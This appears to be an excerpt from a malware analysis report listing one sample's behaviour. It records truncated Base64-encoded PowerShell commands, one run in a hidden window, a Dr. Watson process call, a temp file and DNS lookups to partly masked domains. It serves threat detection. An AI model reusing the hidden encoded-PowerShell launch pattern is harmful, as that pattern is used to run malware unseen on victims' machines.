Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABYAEEAQQBvAEQAUQBBAD0AKAAnAGEAQQAnACsAJwBBACcAKwAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAnAGsAVQAnACwAJwBfAEEAJwApACkAOwAkAFUAWgBBAFEAQQBaAFEAdwAgAD0AIAAoACcANAAzACcAKwAnADgAJwApADsAJAB3AFEAXwB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1544
- %TEMP%\806400.cvr
- DNS ASK de###usa.com
- DNS ASK pl##n.com
- DNS ASK hs#.pw
- DNS ASK me##and.com
- DNS ASK jo##tud.ru
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABYAEEAQQBvAEQAUQBBAD0AKAAnAGEAQQAnACsAJwBBACcAKwAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAnAGsAVQAnACwAJwBfAEEAJwApACkAOwAkAFUAWgBBAFEAQQBaAFEAdwAgAD0AIAAoACcANAAzACcAKwAnADgAJwApADsAJAB3AFEAXwB...' (with hidden window)